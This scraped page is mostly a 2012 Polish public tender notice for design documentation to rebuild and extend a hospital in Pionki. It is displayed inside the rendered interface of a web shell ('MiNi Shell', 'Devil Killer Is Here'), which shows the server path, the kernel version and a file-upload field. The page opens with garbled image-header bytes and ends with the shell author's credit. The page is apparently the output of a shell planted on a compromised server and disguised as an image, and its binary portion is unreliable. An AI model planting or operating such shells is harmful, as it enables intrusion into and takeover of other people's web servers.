JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120516/157832-N-2012.html

<p class="kh_header"><b>Pionki: Opracowanie na terenie działki nr 419/1 oznaczonej na załączonej mapie, z obrębu Pionek   kompleksowej, wielobranżowej, budowlano- wykonawczej dokumentacji architektoniczno - budowlanej i kosztorysowej wraz z zagospodarowaniem terenu dla budynku w Pionkach przy ul. 15 Stycznia 1.</b><br>
<b>Numer ogłoszenia: 157832 - 2012; data zamieszczenia: 16.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Sienkiewicza 29, 26-670 Pionki, woj. mazowieckie, tel. 48 6121866, faks 48 6121381.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzzozpionki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie na terenie działki nr 419/1 oznaczonej na załączonej mapie, z obrębu Pionek   kompleksowej, wielobranżowej, budowlano- wykonawczej dokumentacji architektoniczno - budowlanej i kosztorysowej wraz z zagospodarowaniem terenu dla budynku w Pionkach przy ul. 15 Stycznia 1..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wielkość lub zakres zamówienia: Opis przedmiotu zamówienia
1. Przedmiotem niniejszego postępowania jest opracowanie na terenie działki nr 419/1 oznaczonej na załączonej mapie, z obrębu Pionek   kompleksowej, wielobranżowej, budowlano- wykonawczej dokumentacji architektoniczno - budowlanej i kosztorysowej wraz z zagospodarowaniem terenu dla budynku w Pionkach przy ul. 15 Stycznia 1.2. Wielkość/ zakres zamówienia: 
PRZEBUDOWA I ROZBUDOWA SZPITALA W PIONKACH PRZY UL 15 STYCZNIA 1
Oddział Chirurgiczny,Oddział Położniczo- Ginekologiczny,Blok Operacyjny,
Centralna Sterylizatornia.Rozwiązania projektowe muszą być zgodne z przepisami :
Rozporządzenia Ministra Zdrowia z dnia 02 lutego 2011 roku w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej.(Dz. U.Nr 31.poz. 158r.) oraz załącznikami do nich.3.Projekt zagospodarowania terenu.Należy zaprojektować wraz z dojazdami, parkingami, oświetleniem terenu oraz uzbrojeniem, niezbędnymi sieciami doprowadzającymi media i przyłączami.4.W ramach przedmiotu zamówienia i ceny zawartej w ofercie wykonawca zobowiązany jest do:Opracowania w formie elektronicznej i w 5 egz. kompleksowej budowlano-wykonawczej dokumentacji projektowo-kosztorysowej dla budynku  zgodnie z założeniami programowymi.
Rozporządzeniem Ministra  Zdrowia z dnia 02 lutego  2011 roku w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej.(Dz.U.Nr 31 poz. 158 2011r._ oraz załącznikami do nich.Rozporządzeniem Ministra Infrastruktury z dnia 3 lpca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U.03.120.1133) i Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie(Dz.U. nr 75 poz. 690). Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 16.06.2003r (Dz.U nr 121) w sprawie:
    -uzgadniania projektu budowlanego pod względem ochrony: przeciwpożarowej (1137)    -ochrony  budynków, innych obiektów budowlanych i terenów (poz.1138).
     -przeciwpożarowego zaopatrzenia w wodę oraz dróg pożarowych (poz. 1139).
Prawem budowlanym (Dz. U. z 2003r. Nr.207 poz. 2016 z późn. zm.)
Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004r. Nr 130.poz.1389) oraz innych uwarunkowań  prawnych regulujących projektowanie i realizację inwestycji budowlanych.5.Opracowanie ma zawierać:5.1 Koncepcję architektoniczną w wersji papierowej (3 egz,) w wersji cyfrowej ( 2 egz.)5.2 Budowlano-wykonawcze projekty branżowe (5 egz.) wraz z kosztorysami inwestorskimi (w 2 egz.) opracowanymi metodą kalkulacji szczegółowej oraz specyfikacjami technicznymi wykonania i odbioru robót budowlanych (5 egz ) oraz przedmiarami robót (5 egz.) jako osobne opracowania w zakresie:a)architektoniczno- budowlanej wraz z koniecznymi do realizacji detalami budowlanymi, wykazami stolarki, ślusarki itp. i kolorystyką,b)projekt konstrukcji wraz z obliczeniami,c)wewnętrzne instalacje sanitarne (wod-kan, co. i cw.)d)wewnętrzne instalacje elektryczne, oświetleniowe i dzwonkowe,e)instalacja alarmowa wraz z osprzętem,f)instalacja komputerowa wraz z okablowaniem (sieć LAN10/100), zasilanie, z dostosowaniem do internetu,
g)projekt instalacji alarmowej, p.poż. z systemem sygnalizacji pożaru
h)projekt instalacji kamer przemysłowych CCTVi)instalacja telefoniczna z centralą i stałym łączem internetowym,j)projekt zagospodarowania terenu w skali 1:1000 lub 1:500 na aktualnym podkładzie geodezyjnym z pokazaniem:  -granic działki, usytuowanie wraz z domiarami projektowanego obiektu budowlanego, z wjazdami, wewnętrznym układem komunikacyjnym w  powiązaniu z komunikacja zewnętrzną, z lokalizacją wymaganych parkingów, placów i dojazdów, oświetleniem terenu i zielenią towarzyszącą, z podaniem sposobu odwodniania dróg wewnętrznych i budynku. l)  zbiorcza plansza uzbrojenia i zagospodarowania terenu uzgodniona w ZUD m) projekty sieci i przyłączy zewnętrznych,     -wod-kan,-energetyczne,
-telefoniczne, internetowe,n) projekty drogowe dla całego układu komunikacyjnego obsługującego obiekt z odwodnieniem terenów utwardzonych, o) inwentaryzacja zieleni wraz z projektem zieleni ze  wskazaniem ewentualnych wycinek  6.Opracowanie dokumentacji hydrologicznej wraz z badaniami geotechnicznymi gruntu.7.Sporządzanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia projektowanego obiektu budowlanego, która posłuży do opracowania przez wykonawcę robót planu bezpieczeństwa i ochrony zdrowia dla realizacji budowy.
8. W/w elementy dokumentacji muszą być skoordynowane międzybranżowo za co odpowiada Wykonawca-Główny Projektant1. Ostateczną koncepcję należy uzgodnić z Zamawiającym 2. Dokumentację należy uzgodnić ,SANEPID, BHP, P/POz,  z Zamawiającym.  Należy uzyskać wszystkie warunki techniczne przydziału i dostawy mediów zgodnie z wymogami obiektu oraz obowiązującymi zasadami i przepisami.3.Wykonawca zapewni nadzór autorski wszystkich branż na etapie prowadzenia procedury przetargowej na budowę obiektu w zakresie udzielania odpowiedzi przez Zamawiającego na zapytania zadane przez Wykonawcę w zakresie spraw    technicznych, budowlanych, branżowych i kosztorysów w przypadku zaistnienia    niejasności, a także na etapie realizacji inwestycji .Cenę za nadzór autorski za pobyt na budowie należy wyliczyć na podstawie Środowiskowych Zasad Wyceny Prac Projektowych i wpisać jako obowiązującą do druku oferty. 4.Wykonawca udzieli gwarancji i rękojmi na 3 lata liczonych od dnia odbioru końcowego przedmiotu zamówienia. 5.Przekazanie dokumentacji na podstawie oświadczenia o treści:przekładam do odbioru dokumentację zgodnie z zakresem określonym w umowie  i oświadczam, że jest kompletna z punktu widzenia celu, któremu ma służyć i jest zgodna z wymogami prawa budowlanego, przepisami oraz zasadami wiedzy technicznej 6.Załączona dokumentacja powinna zawierać wykaz wykonanych projektów i innych dokumentów stanowiących integralną część projektu.Opis przedmiotu zamówienia wg CPV - Opis przedmiotu zamówienia wg CPV (zgodnie z art.30 ust.7 ustawy): 74000000-9 usługi profesjonalne w zakresie architektury, inżynierii, budowy, prawa, księgowości oraz inne, , 74222000-1 usługi projektowania architektonicznego, 74225000-2 usługi architektoniczne, inżynieryjne i pomiarowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.00.00.00-9, 74.22.20.00-1, 74.22.50.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać się wykazem wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenie działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia ( wartość porównywalna z wartością określoną w ofercie wykonawcy),z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Należy załączyć także dokumenty potwierdzające, ze usługi te zostały wykonane należycie. Wymagane wykazanie wykonania co najmniej 1 usługi odpowiadającej przedmiotowi zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia będącego przedmiotem niniejszego postępowania, a także zakresu wykonywanych przez nich czynności .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że posiadają aktualne i opłacone przynajmniej na dzień składania ofert ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia..........ocena spełniania warunków określonych przez wykonawców w przedmiotowym postępowaniu o zamówienie publiczne zostanie dokonana przez zamawiającego w oparciu o kompletność i prawidłowość złożonych wraz z ofertą dokumentów i oświadczeń dostarczonych przez wykonawców, a wymienionych w rozdz. V niniejszej specyfikacji, na zasadzie klasyfikacji: spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz oferty - załącznik nr 1 do SIWZ 2.Pełnomocnictwo do podpisania oferty (oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza) - tylko w sytuacji, gdy dokumenty i oświadczenia składające się na ofertę podpisane będą przez osobę inną niż uprawnioną do reprezentacji zgodnie z treścią odpisu z KRS lub zaświadczenia o wpisie do ewidencji działalności gospodarczej.3.Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają uprawnienie budowlane w zakresie niezbędnym do wykonania przedmiotu zamówienia lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w tym zakresie oraz należą( przynajmniej na dzień składania ofert) do właściwej izby samorządu zawodowego.Oświadczenie o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzzozpionki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej, ul. Sienkiewicza 29, 26-670 Pionki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2012 godzina 09:50, miejsce: Ofertę należy złożyć w sekretariacie lub przesłać na adres zamawiającego, tj. Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej, ul. Sienkiewicza 29, 26-670 Pionki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacje dodatkowe: 1.Zamawiający nie zamierza zawierać umowy ramowej ani ustanawiać dynamicznego systemu zakupów,2.Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej,3.Zamawiający nie przewiduje udzielenia zamówień uzupełniających, o których mowa w art.67 ust.1 pkt.6 ustawy. 4.Osoba uprawniona do porozumiewania się z wykonawcami: Ewa Płachta, tel./ fax. (48) 612 18 66 wew.110, tel. w godz. od 08:00 do 14:00,  adres poczty elektronicznej: przetargi@spzzozpionki.pl 
- w sprawach dotyczących przedmiotu zamówienia- mgr inż. Jolanta Oko, tel. (48) 612 18 66 w 1465.Numer referencyjny nadany sprawie przez zamawiającego: SZP - 19/2012 6.Sposób uzyskania specyfikacji istotnych warunków zamówienia: do 30.05.2012r., do godz. 09:50, odbiór osobisty lub za pobraniem pocztowym (na podstawie wniosku wykonawcy o przekazanie specyfikacji): płatne 23,00PLN, specyfikację udostępnia się także nieodpłatnie na stronie internetowej zamawiającego.7.Ofertę składa się pod rygorem nieważności w formie pisemnej, dlatego też formularz oferty, oświadczenie o spełnianiu warunków udziału w postępowaniu, oświadczenia o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia oraz wykaz wykonanych lub wykonywanych usług należy przedstawić w formie oryginału. Pozostałe dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.  8.Postępowanie o udzielenie zamówienia prowadzi się w języku polskim, postanowienia art.9 ust.3 nie mają zastosowania. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.9.  Niniejsze postępowanie prowadzone jest z zastosowaniem przepisów ustawy z dnia 29 stycznia 2004r. Prawo zamówień     publicznych (Dz. U. z 2010r., nr 113, poz.759, nr 161, poz.1078, i nr 182, poz.1228 oraz z 2011r., nr 5, poz.13, nr 28, poz.143 i nr 87, poz.484),  z uwzględnieniem obowiązujących aktów wykonawczych do ww. ustawy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com